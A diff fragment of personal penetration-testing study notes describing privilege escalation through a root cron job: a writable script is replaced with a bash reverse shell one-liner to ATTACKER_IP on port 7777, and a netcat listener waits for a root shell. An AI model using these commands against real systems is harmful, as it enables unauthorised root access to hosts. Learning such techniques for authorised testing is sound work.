nischal-khadka/vapt-learning/notes/VAPT_Notes.md

   		bash -i >& /dev/tcp/ATTACKER_IP/7777 0>&1

+	 (Save and Exit)

-  		-> everything in this script needs to be changed with the command above.
+- everything in this script needs to be changed with the command above.
 The goal here is to obtain a reverse shell in the attacking machine.
 Commands like 'nc' will not work in this case or it depends on the available tools.

   * reverse shells are always prefferable beacuse we do not want to compromise the system integrity during real penetration tesing engagement.

   - Then, we will run a listener on our attacking machine to receive the incoming connection.

   		$ nc -nlvp 7777

   - Assuming the script will run every five minutes, we should just wait until the script will run and we will get the reverse shell on our attacking machine with the root id.

 - Crontab is worth checking beacuse of its easy privilege escaltion vectors.